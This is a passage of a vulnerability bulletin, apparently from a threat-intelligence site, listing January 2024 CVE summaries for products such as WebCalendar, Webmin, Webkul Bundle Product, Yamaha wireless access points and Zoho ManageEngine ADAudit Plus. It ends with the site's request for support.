united_boxing_gym — mini-app_line | An issue in UNITED BOXING GYM mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token. | 2024-01-26 | not yet calculated | CVE-2023-48128 [email protected] |
webcalendar — webcalendar | WebCalendar v1.3.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /WebCalendarvqsmnseug2/edit_entry.php. | 2024-01-25 | not yet calculated | CVE-2024-22635 [email protected] |
webkul — bundle | SQL injection vulnerability in Webkul Bundle Product 6.0.1 allows a remote attacker to execute arbitrary code via the id_product parameters in the UpdateProductQuantity function. | 2024-01-23 | not yet calculated | CVE-2023-51210 [email protected] |
webmin — webmin | Cross Site Scripting vulnerability (XSS) in webmin v.2.105 and earlier allows a remote attacker to execute arbitrary code via a crafted payload to the “Execute cron job as” tab Input field. | 2024-01-25 | not yet calculated | CVE-2023-52046 [email protected] |
whatacart — whatacart | WhatACart v2.0.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /site/default/search. | 2024-01-26 | not yet calculated | CVE-2024-22551 [email protected] |
yamaha_corporation — wlx222 | Active debug code exists in Yamaha wireless LAN access point devices. If a logged-in user who knows how to use the debug function accesses the device’s management page, this function can be enabled by performing specific operations. As a result, an arbitrary OS command may be executed and/or configuration settings of the device may be altered. Affected products and versions are as follows: WLX222 firmware Rev.24.00.03 and earlier, WLX413 firmware Rev.22.00.05 and earlier, WLX212 firmware Rev.21.00.12 and earlier, WLX313 firmware Rev.18.00.12 and earlier, and WLX202 firmware Rev.16.00.18 and earlier. | 2024-01-24 | not yet calculated | CVE-2024-22366 [email protected] [email protected] |
zoho — manageengine | Zoho ManageEngine ADAudit Plus before 7270 allows admin users to view names of arbitrary directories via path traversal. | 2024-01-25 | not yet calculated | CVE-2023-50785 [email protected] |
A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.
If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below
To keep up to date follow us on the below channels.